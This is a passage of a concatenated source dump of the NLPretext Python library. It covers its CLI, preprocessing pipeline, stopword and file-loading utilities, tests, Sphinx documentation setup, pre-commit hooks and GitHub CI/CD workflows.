toctree:: 11 | :maxdepth: {{ maxdepth }} 12 | {% for docname in docnames %} 13 | {{ docname }} 14 | {%- endfor %} 15 | {%- endmacro %} 16 | 17 | {%- if is_namespace %} 18 | {{- ["**", pkgname, "**"] | join("") | heading }} 19 | {% else %} 20 | {% set pkg_list = pkgname.split('.') %} 21 | {{- ["**", pkg_list[-1], "**"] | join("") | heading }} 22 | {% endif %} 23 | 24 | {%- if modulefirst and not is_namespace %} 25 | {{ automodule(pkgname, automodule_options) }} 26 | {% endif %} 27 | 28 | {%- if subpackages %} 29 | 30 | {{ toctree(subpackages) }} 31 | {% endif %} 32 | 33 | {%- if submodules %} 34 | {% if separatemodules %} 35 | {{ toctree(submodules) }} 36 | {% else %} 37 | {%- for submodule in submodules %} 38 | {% if show_headings %} 39 | {% set submodule_list = submodule.split('.') %} 40 | {{- [submodule_list[-1]] | join(" ") | e | heading(2) }} 41 | {% endif %} 42 | {{ automodule(submodule, automodule_options) }} 43 | {% endfor %} 44 | {%- endif %} 45 | {%- endif %} 46 | 47 | {%- if not modulefirst and not is_namespace %} 48 | 49 | {{ automodule(pkgname, automodule_options) }} 50 | {% endif %} 51 | -------------------------------------------------------------------------------- /nlpretext/cli/preprocess.py: -------------------------------------------------------------------------------- 1 | from typing import List 2 | 3 | import typer 4 | from nlpretext.preprocessor import Preprocessor 5 | from nlpretext.textloader import TextLoader 6 | from rich.console import Console 7 | 8 | app = typer.Typer() 9 | console = Console() 10 | 11 | 12 | @app.command() 13 | def run( 14 | input: List[str] = typer.Option( # noqa: B008 15 | [], 16 | "-i", 17 | "--input", 18 | case_sensitive=False, 19 | help="List of files that will be preprocessed", 20 | ), 21 | output: str = typer.Option( 22 | None, 23 | "-o", 24 | "--output", 25 | case_sensitive=False, 26 | help="File that will store the result of the preprocessing", 27 | ), 28 | ) -> None: 29 | """Runs NLPretext on a list of files and outputs the result in parquet format 30 | or shows the result if no output is provided. 31 | 32 | Args: 33 | 34 | input: List of files that will be preprocessed 35 | 36 | output: File that will store the result of the preprocessing 37 | """ 38 | text_loader = TextLoader() 39 | preprocessor = Preprocessor() 40 | preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor) 41 | if output: 42 | preprocessed_text_dataframe.to_parquet(output) 43 | else: 44 | console.print(preprocessed_text_dataframe) 45 | -------------------------------------------------------------------------------- /nlpretext/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 
14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | 19 | # mypy: disable-error-code="attr-defined" 20 | # mypy: disable-error-code="assignment" 21 | 22 | """All the goto functions you need to handle NLP use-cases, integrated in NLPretext.""" 23 | 24 | from importlib.metadata import PackageNotFoundError, version 25 | 26 | from nlpretext.preprocessor import Preprocessor 27 | 28 | try: 29 | __version__ = version(__name__) 30 | except PackageNotFoundError: # pragma: no cover 31 | __version__ = "unknown" 32 | 33 | 34 | __all__ = ["Preprocessor"] 35 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | default_language_version: 2 | python: python3.10 3 | 4 | 5 | repos: 6 | - repo: https://github.com/pre-commit/pre-commit-hooks 7 | rev: v4.5.0 8 | hooks: 9 | - id: trailing-whitespace 10 | - id: end-of-file-fixer 11 | - id: check-yaml 12 | - id: check-toml 13 | - id: check-json 14 | - id: check-added-large-files 15 | 16 | - repo: local 17 | hooks: 18 | - id: isort 19 | name: isort 20 | entry: poetry run isort --settings-path pyproject.toml 21 | types: [python] 22 | language: system 23 | stages: [commit, push] 24 | - id: pyupgrade 25 | name: pyupgrade 26 | entry: poetry run pyupgrade --py38-plus 27 | types: [python] 28 | language: system 29 | stages: [commit, push] 30 | - id: black 31 | name: black 32 | entry: poetry run black --config pyproject.toml 33 | types: [python] 34 | language: system 35 | stages: [commit, push] 36 | - id: ruff 37 | name: ruf 38 | entry: poetry run ruff check --config pyproject.toml 39 | types: [python] 40 | language: system 41 | stages: [commit, push] 42 | - id: mypy 43 | name: mypy 44 | entry: poetry run mypy 45 | require_serial: true 46 | types: [python] 47 | language: system 48 | stages: [push] 49 | - id: gitleaks 50 | name: gitleaks 51 | entry: make gitleaks 52 | require_serial: true 53 | types: [file] 54 | language: system 55 | pass_filenames: false 56 | stages: [push] 57 | -------------------------------------------------------------------------------- /docs/scripts/buildsite.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct) 4 | 5 | ############## 6 | # BUILD DOCS # 7 | ############## 8 | 9 | # Python Sphinx, configured with source/conf.py 10 | # See https://www.sphinx-doc.org/ 11 | 12 | cd docs/ 13 | 14 | current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match) 15 | current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6) 16 | 17 | make clean 18 | make apidoc 19 | git add . 20 | git commit -m "Commit needed for multiversioning" 21 | 22 | git pull --tags 23 | git tag -a latest -m "Latest version of the package" 24 | 25 | make multiversion 26 | 27 | ####################### 28 | # Update GitHub Pages # 29 | ####################### 30 | 31 | docroot=`mktemp -d` 32 | cp -r build/html/* ${docroot} 33 | 34 | cd .. 35 | 36 | git branch -d gh-pages 37 | git checkout --orphan gh-pages 38 | git rm --cached -r . 
39 | git clean -fdx 40 | 41 | # Adds .nojekyll file to the root to signal to GitHub that 42 | # directories that start with an underscore (_) can remain 43 | touch .nojekyll 44 | 45 | # Add index.html 46 | cat > index.html < 48 | 49 | 50 | Redirecting to the latest release 51 | 52 | 53 | 54 | 55 | 56 | EOF 57 | 58 | # Add README 59 | cat > README.md <> $GITHUB_PATH 63 | 64 | - name: Install dependencies 65 | run: | 66 | poetry run pip install --upgrade pip 67 | poetry install -E torch -E dask 68 | 69 | - name: Run safety checks 70 | run: | 71 | STRICT=1 make check-safety 72 | 73 | - name: Lint and format 74 | run: | 75 | make format-code 76 | 77 | - name: Run tests 78 | run: | 79 | make test 80 | -------------------------------------------------------------------------------- /tests/test_phone_number.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | import nlpretext._utils.phone_number as phone 19 | from nlpretext._config.config import SUPPORTED_COUNTRY 20 | 21 | 22 | def test_extract_phone_number(): 23 | input_str = "(541) 754-3010 is a US. Phone" 24 | expected = ["(541) 754-3010", "754-3010"] 25 | res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY) 26 | assert sorted(res) == sorted(expected) 27 | 28 | 29 | def test_extract_phone_number_us(): 30 | input_str = "(541) 754-3010 is a US. 
Phone" 31 | expected = ["(541) 754-3010"] 32 | res = phone.extract_phone_numbers(input_str, countrylist=["US"]) 33 | assert res == expected 34 | 35 | 36 | def test_extract_phone_number_fr(): 37 | input_str = "06.00.00.00.00 is a FR Phone" 38 | expected = ["06.00.00.00.00"] 39 | res = phone.extract_phone_numbers(input_str, countrylist=["FR"]) 40 | assert res == expected 41 | 42 | 43 | def test_extract_phone_number_international(): 44 | input_str = "+33600000000 is an international Phone number" 45 | expected = ["+33600000000"] 46 | res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None]) 47 | assert res == expected 48 | 49 | 50 | def test_phone_parser_us(): 51 | input_str = "(541) 754-3010" 52 | expected = "+1 541-754-3010" 53 | p = phone.PhoneParser() 54 | p.parse_number(input_str, region_code="US") 55 | res = p.format_number("INTERNATIONAL") 56 | assert res == expected 57 | 58 | 59 | def test_phone_parser_fr(): 60 | input_str = "0600000000" 61 | expected = "+33600000000" 62 | p = phone.PhoneParser() 63 | p.parse_number(input_str, region_code="FR") 64 | res = p.format_number("E164") 65 | assert res == expected 66 | -------------------------------------------------------------------------------- /nlpretext/preprocessor.py: -------------------------------------------------------------------------------- 1 | from typing import Any, Callable, Dict, List, Optional 2 | 3 | from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters 4 | from nlpretext.social.preprocess import ( 5 | remove_emoji, 6 | remove_hashtag, 7 | remove_html_tags, 8 | remove_mentions, 9 | ) 10 | from sklearn.pipeline import Pipeline 11 | from sklearn.preprocessing import FunctionTransformer 12 | 13 | 14 | class Preprocessor: 15 | def __init__(self): 16 | """Initialize preprocessor object to apply all text transformation.""" 17 | self.__operations = [] 18 | self.pipeline = None 19 | 20 | def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None: 21 | """ 22 | Add an operation and its arguments to pipe in the preprocessor. 23 | 24 | Parameters 25 | ---------- 26 | operation : callable 27 | text preprocessing function 28 | args : dict of arguments 29 | """ 30 | self.__operations.append({"operation": operation, "args": args}) 31 | 32 | @staticmethod 33 | def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline: 34 | """ 35 | Build sklearn pipeline from a operation list. 36 | 37 | Parameters 38 | ---------- 39 | operation_list : iterable 40 | list of __operations of preprocessing 41 | 42 | Returns 43 | ------- 44 | sklearn.pipeline.Pipeline 45 | """ 46 | return Pipeline( 47 | steps=[ 48 | ( 49 | operation["operation"].__name__, 50 | FunctionTransformer(operation["operation"], kw_args=operation["args"]), 51 | ) 52 | for operation in operation_list 53 | ] 54 | ) 55 | 56 | def run(self, text: str) -> str: 57 | """ 58 | Apply pipeline to text. 
59 | 60 | Parameters 61 | ---------- 62 | text : string 63 | text to preprocess 64 | 65 | Returns 66 | ------- 67 | string 68 | """ 69 | operations = self.__operations 70 | if operations == []: 71 | operations_to_pipe = ( 72 | remove_html_tags, 73 | remove_mentions, 74 | remove_emoji, 75 | remove_hashtag, 76 | remove_eol_characters, 77 | fix_bad_unicode, 78 | normalize_whitespace, 79 | ) 80 | operations = [ 81 | {"operation": operation, "args": None} for operation in operations_to_pipe 82 | ] 83 | self.pipeline = self.build_pipeline(operations) 84 | text = self.pipeline.transform(text) 85 | return text 86 | -------------------------------------------------------------------------------- /nlpretext/_utils/stopwords.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List 18 | 19 | from nlpretext._config.stopwords import STOPWORDS 20 | from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING 21 | from stop_words import get_stop_words as _get_stop_words 22 | 23 | 24 | def get_stopwords(lang: str = "en") -> List[str]: 25 | """Input a language code, returns a list of stopwords for the specified language. 26 | 27 | Parameters 28 | ---------- 29 | lang : str 30 | Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en', 31 | 'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru', 32 | 'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo', 33 | 'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl', 34 | 'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl', 35 | 'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th', 36 | 'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en'] 37 | 38 | Returns 39 | ------- 40 | list 41 | list of stopwords for a given language 42 | 43 | Raises 44 | ------ 45 | ValueError 46 | When language is not available yet or incorrect country code 47 | """ 48 | if isinstance(lang, str) and len(lang) == 2: 49 | lang = lang.lower() 50 | custom_stopwords = STOPWORDS 51 | stopwords = [] 52 | 53 | supported_lang_lib = list(_LANGUAGE_MAPPING.keys()) 54 | supported_lang_custom = list(custom_stopwords.keys()) 55 | supported_lang = supported_lang_lib + supported_lang_custom 56 | if lang in supported_lang: 57 | if lang in supported_lang_lib: 58 | stopwords += _get_stop_words(lang) 59 | if lang in supported_lang_custom: 60 | stopwords += custom_stopwords[lang] 61 | else: 62 | raise ValueError( 63 | "Language not available yet or incorrect country code." 64 | f" Supported languages: {supported_lang}" 65 | ) 66 | else: 67 | raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. 
') 68 | return list(set(stopwords)) 69 | -------------------------------------------------------------------------------- /tests/test_data_augmentation.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from nlpretext.augmentation.text_augmentation import ( 3 | CouldNotAugment, 4 | UnavailableAugmenter, 5 | get_augmenter, 6 | process_entities_and_text, 7 | ) 8 | 9 | 10 | @pytest.mark.parametrize( 11 | "text, text_augmented, entities, expected", 12 | [ 13 | ( 14 | "I want to buy a small black handbag.", 15 | "I want to acquire a small black handbag", 16 | [ 17 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21}, 18 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27}, 19 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35}, 20 | ], 21 | {"type": str, "entities": ["black", "handbag", "small"]}, 22 | ), 23 | ( 24 | "I want to buy a small black handbag.", 25 | "I would like to buy a black small handbag", 26 | [ 27 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21}, 28 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27}, 29 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35}, 30 | ], 31 | {"type": str, "entities": ["black", "handbag", "small"]}, 32 | ), 33 | ], 34 | ) 35 | def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected): 36 | augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented) 37 | augmented_entities = sorted(el["word"] for el in augmented_entities) 38 | assert {"type": type(augmented_text), "entities": augmented_entities} == expected 39 | 40 | 41 | @pytest.mark.parametrize( 42 | "text, text_augmented, entities", 43 | [ 44 | ( 45 | "I live in New York and I am looking for a lipstick", 46 | "I live in New and York I an looking for a lipstick", 47 | [ 48 | {"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18}, 49 | {"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50}, 50 | ], 51 | ) 52 | ], 53 | ) 54 | def test_process_entities_and_text_altered(text, text_augmented, entities): 55 | with pytest.raises(CouldNotAugment) as excinfo: 56 | process_entities_and_text(entities, text, text_augmented) 57 | assert ( 58 | str(excinfo.value) == "Text was not correctly augmented because entities were altered" 59 | ) 60 | 61 | 62 | def test_get_augmenter(): 63 | method = "ppdb_synonym" 64 | with pytest.raises(UnavailableAugmenter) as excinfo: 65 | get_augmenter(method) 66 | assert ( 67 | str(excinfo.value) 68 | == "The given augmenter is not supported. You must choose one \ 69 | of the following: wordnet_synonym or aug_sub_bert" 70 | ) 71 | -------------------------------------------------------------------------------- /nlpretext/_utils/file_loader.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 
9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | # mypy: disable-error-code="assignment" 19 | 20 | from typing import List, Union 21 | 22 | import chardet 23 | from nlpretext._config import constants 24 | 25 | 26 | def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str: 27 | """ 28 | Predict a file's encoding using chardet. 29 | 30 | Parameters 31 | ---------- 32 | file_path_or_string : string 33 | if filepath, will open the file. Otherwise will predict from the string 34 | n_lines : int 35 | number of line to predict from 36 | 37 | Returns 38 | ------- 39 | string 40 | the code of the detected encoding 41 | """ 42 | if isinstance(file_path_or_string, bytes): 43 | rawdata = file_path_or_string 44 | else: 45 | with open(file_path_or_string, "rb") as f: 46 | rawdata = b"".join([f.readline() for _ in range(n_lines)]) 47 | chardet_value: str = chardet.detect(rawdata) 48 | return chardet_value 49 | 50 | 51 | def check_text_file_format(filepath: Union[str, List[str]]) -> str: 52 | """ 53 | Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt. 54 | 55 | Parameters 56 | ---------- 57 | filepath : str | list(str) 58 | A filepath with wildcard (eg. *.txt), or a list of filepaths. 59 | 60 | Returns 61 | ------- 62 | str 63 | Format of the specified file path, among .json, .csv, .parquet or .txt 64 | """ 65 | pattern = constants.TEXT_FILE_FORMATS_PATTERN 66 | if not isinstance(filepath, (list, tuple)): 67 | filepath = [filepath] 68 | format_re_list = [pattern.match(path) for path in filepath] 69 | format_list = [format_re.group(1) for format_re in format_re_list if format_re] 70 | if len(set(format_list)) > 1: 71 | raise ValueError(f"Multiple file formats found in file path list: {format_list}") 72 | if None in format_re_list: 73 | raise ValueError( 74 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted" # noqa: E501 75 | ) 76 | file_format = format_list[0] 77 | return file_format 78 | -------------------------------------------------------------------------------- /docs/source/conf.py: -------------------------------------------------------------------------------- 1 | # Configuration file for the Sphinx documentation builder. 2 | # 3 | # This file only contains a selection of the most common options. For a full 4 | # list see the documentation: 5 | # https://www.sphinx-doc.org/en/master/usage/configuration.html 6 | 7 | # -- Path setup -------------------------------------------------------------- 8 | 9 | # If extensions (or modules to document with autodoc) are in another directory, 10 | # add these directories to sys.path here. If the directory is relative to the 11 | # documentation root, use os.path.abspath to make it absolute, like shown here. 
12 | # 13 | import os 14 | import sys 15 | 16 | sys.path.insert(0, os.path.abspath("..")) 17 | 18 | 19 | # -- Project information ----------------------------------------------------- 20 | 21 | project = "nlpretext" 22 | author = "artefactory" 23 | 24 | # -- General configuration --------------------------------------------------- 25 | 26 | # Add any Sphinx extension module names here, as strings. They can be 27 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom 28 | # ones. 29 | extensions = [ 30 | "sphinx.ext.autodoc", 31 | "sphinx.ext.autosummary", 32 | "sphinx.ext.intersphinx", 33 | "sphinx.ext.mathjax", 34 | "sphinx.ext.napoleon", 35 | "sphinx.ext.todo", 36 | "sphinx.ext.viewcode", 37 | "recommonmark", 38 | "nbsphinx", 39 | "sphinx_multiversion", 40 | "sphinx_autodoc_typehints", 41 | "sphinx_rtd_theme", 42 | ] 43 | 44 | source_suffix = { 45 | ".rst": "restructuredtext", 46 | ".txt": "restructuredtext", 47 | ".md": "markdown", 48 | } 49 | 50 | source_parsers = {".md": "recommonmark.parser.CommonMarkParser"} 51 | 52 | nbsphinx_execute = "never" 53 | 54 | github_url = "https://github.com/artefactory/NLPretext" 55 | 56 | smv_prefer_remote_refs = False 57 | smv_remote_whitelist = None 58 | smv_prebuild_command = ( 59 | "poetry run sphinx-apidoc -f -o source/apidoc/ " 60 | "../nlpretext/ " 61 | "--implicit-namespaces -M -t source/_templates" 62 | ) 63 | 64 | # Add any paths that contain templates here, relative to this directory. 65 | templates_path = ["_templates"] 66 | 67 | # Autodoc parameters 68 | always_document_param_types = True 69 | add_module_names = False 70 | autodoc_member_order = "bysource" 71 | 72 | # -- Options for HTML output ------------------------------------------------- 73 | 74 | # The theme to use for HTML and HTML Help pages. See the documentation for 75 | # a list of builtin themes. 76 | 77 | html_theme = "sphinx_rtd_theme" 78 | 79 | github_url = "https://www.github.com/artefactory/NLPretext}" 80 | 81 | 82 | # Add any paths that contain custom static files (such as style sheets) here, 83 | # relative to this directory. They are copied after the builtin static files, 84 | # so a file named "default.css" will overwrite the builtin "default.css". 85 | html_static_path = ["_static"] 86 | 87 | # -- Options for LaTeX output ------------------------------------------------ 88 | 89 | latex_elements = { 90 | # Font packages 91 | "fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}" 92 | } 93 | -------------------------------------------------------------------------------- /docs/source/tutorials/basic_notebook.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# How to use the package in a notebook\n", 8 | "\n", 9 | "
\n", 10 | "\n", 11 | "
\n", 12 | "\n", 13 | "![Python Logo](../_static/images/python_logo.png)\n", 14 | "\n", 15 | "
\n", 16 | "\n", 17 | "### *nlpretext*\n", 18 | "\n", 19 | "
\n", 20 | "\n", 21 | "## Installing from the main branch\n", 22 | "\n", 23 | "To install the library from the main branch, you can run the following cell :" 24 | ] 25 | }, 26 | { 27 | "cell_type": "code", 28 | "execution_count": null, 29 | "metadata": { 30 | "pycharm": { 31 | "name": "#%%\n" 32 | } 33 | }, 34 | "outputs": [], 35 | "source": [ 36 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main" 37 | ] 38 | }, 39 | { 40 | "cell_type": "markdown", 41 | "metadata": {}, 42 | "source": [ 43 | "## Installing from a specific release\n", 44 | "\n", 45 | "To install the library from a specific release, you can run the following cell :" 46 | ] 47 | }, 48 | { 49 | "cell_type": "code", 50 | "execution_count": null, 51 | "metadata": { 52 | "pycharm": { 53 | "name": "#%%\n" 54 | } 55 | }, 56 | "outputs": [], 57 | "source": [ 58 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5" 59 | ] 60 | }, 61 | { 62 | "cell_type": "markdown", 63 | "metadata": {}, 64 | "source": [ 65 | "## Using the package\n", 66 | "\n", 67 | "You can now import and run whatever is in the package :" 68 | ] 69 | }, 70 | { 71 | "cell_type": "code", 72 | "execution_count": null, 73 | "metadata": { 74 | "pycharm": { 75 | "name": "#%%\n" 76 | } 77 | }, 78 | "outputs": [], 79 | "source": [ 80 | "from nlpretext.basic.preprocess import replace_emails\n", 81 | "\n", 82 | "example = \"I have forwarded this email to obama@whitehouse.gov\"\n", 83 | "example = replace_emails(example, replace_with=\"*EMAIL*\")" 84 | ] 85 | }, 86 | { 87 | "cell_type": "code", 88 | "execution_count": null, 89 | "metadata": { 90 | "pycharm": { 91 | "name": "#%%\n" 92 | } 93 | }, 94 | "outputs": [], 95 | "source": [ 96 | "print(example)" 97 | ] 98 | } 99 | ], 100 | "metadata": { 101 | "kernelspec": { 102 | "display_name": "Python 3", 103 | "language": "python", 104 | "name": "python3" 105 | }, 106 | "language_info": { 107 | "codemirror_mode": { 108 | "name": "ipython", 109 | "version": 3 110 | }, 111 | "file_extension": ".py", 112 | "mimetype": "text/x-python", 113 | "name": "python", 114 | "nbconvert_exporter": "python", 115 | "pygments_lexer": "ipython3", 116 | "version": "3.7.9" 117 | } 118 | }, 119 | "nbformat": 4, 120 | "nbformat_minor": 1 121 | } 122 | -------------------------------------------------------------------------------- /.github/workflows/cd.yml: -------------------------------------------------------------------------------- 1 | name: Continuous Deployment 2 | on: 3 | release: 4 | types: [published] 5 | 6 | jobs: 7 | 8 | docker: 9 | 10 | runs-on: ubuntu-latest 11 | 12 | steps: 13 | - name: Checkout 14 | uses: actions/checkout@v4 15 | 16 | - name: Set up Docker Buildx 17 | uses: docker/setup-buildx-action@v3 18 | 19 | - name: Login to Github Container Registry 20 | uses: docker/login-action@v3 21 | with: 22 | username: ${{ github.actor }} 23 | password: ${{ secrets.GITHUB_TOKEN }} 24 | registry: ghcr.io 25 | 26 | - name: Set tag name 27 | id: tag 28 | run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT 29 | env: 30 | GITHUB_REF: ${{ github.ref }} 31 | 32 | - name: Build and push 33 | uses: docker/build-push-action@v4 34 | with: 35 | context: . 
36 | file: ./docker/Dockerfile 37 | push: true 38 | tags: | 39 | ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }} 40 | ghcr.io/artefactory/nlpretext:latest 41 | cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest 42 | cache-to: type=inline 43 | 44 | - name: Scan image 45 | uses: anchore/scan-action@v3 46 | id: scan 47 | with: 48 | image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}" 49 | output-format: table 50 | 51 | - name: upload Anchore scan SARIF report 52 | if: success() || failure() 53 | uses: github/codeql-action/upload-sarif@v1 54 | with: 55 | sarif_file: ${{ steps.scan.outputs.sarif }} 56 | 57 | documentation_and_package: 58 | 59 | runs-on: ubuntu-latest 60 | 61 | strategy: 62 | matrix: 63 | python-version: ["3.8"] 64 | 65 | steps: 66 | 67 | - name: Checkout 68 | uses: actions/checkout@v4 69 | 70 | - name: Set up Python ${{ matrix.python-version }} 71 | uses: actions/setup-python@v4 72 | with: 73 | python-version: ${{ matrix.python-version }} 74 | 75 | - name: Install poetry and pandoc 76 | run: | 77 | sudo apt-get install pandoc 78 | make download-poetry 79 | 80 | - name: Set up cache 81 | uses: actions/cache@v3.3.2 82 | with: 83 | path: ~/.cache/pypoetry/virtualenvs 84 | key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }} 85 | 86 | - name: Set Poetry Path 87 | run: | 88 | echo "$HOME/.poetry/bin" >> $GITHUB_PATH 89 | 90 | - name: Install dependencies 91 | run: | 92 | poetry install -E torch -E dask 93 | 94 | - name: Publish to PyPI 95 | env: 96 | PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }} 97 | run: | 98 | poetry config pypi-token.pypi $PYPI_TOKEN 99 | poetry publish --build 100 | 101 | - name: Run build script for Sphinx pages 102 | run: | 103 | poetry run git config --global user.name "Github-Pages Bot" 104 | poetry run git config --global user.email "github-pages@artefactory.com" 105 | poetry run sh docs/scripts/buildsite.sh 106 | shell: bash 107 | -------------------------------------------------------------------------------- /nlpretext/token/preprocess.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List, Optional 18 | 19 | import re 20 | 21 | from nlpretext._utils.stopwords import get_stopwords 22 | 23 | 24 | def remove_stopwords( 25 | tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None 26 | ) -> List[str]: 27 | """ 28 | Remove stopwords from a text. 29 | eg. 'I like when you move your body !' -> 'I move body !'. 30 | 31 | Parameters 32 | ---------- 33 | tokens: list(str) 34 | list of tokens 35 | lang: str 36 | language iso code (e.g : "en") 37 | custom_stopwords : list(str)|None 38 | list of custom stopwords to add. 
None by default
39 | 
40 |     Returns
41 |     -------
42 |     list
43 |         tokens without stopwords
44 |     """
45 |     stopwords = get_stopwords(lang)
46 |     if custom_stopwords:
47 |         stopwords += custom_stopwords
48 |     tokens = [word for word in tokens if word not in stopwords]
49 |     return tokens
50 | 
51 | 
52 | def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:
53 |     """
54 |     Take a list of tokens and return it without the tokens that include
55 |     numbers or special characters.
56 |     ['foo','bar','124','34euros'] -> ['foo','bar'].
57 | 
58 |     Parameters
59 |     ----------
60 |     tokens : list
61 |         list of tokens to be cleaned
62 | 
63 |     Returns
64 |     -------
65 |     list
66 |         list of tokens containing only letters
67 |     """
68 |     tokens = [word for word in tokens if re.search("[^a-zA-Z]", word) is None]
69 |     return tokens
70 | 
71 | 
72 | def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:
73 |     """
74 |     Remove tokens that don't contain any number or letter.
75 |     eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"].
76 | 
77 |     Parameters
78 |     ----------
79 |     tokens : list
80 |         list of tokens to be cleaned
81 | 
82 |     Returns
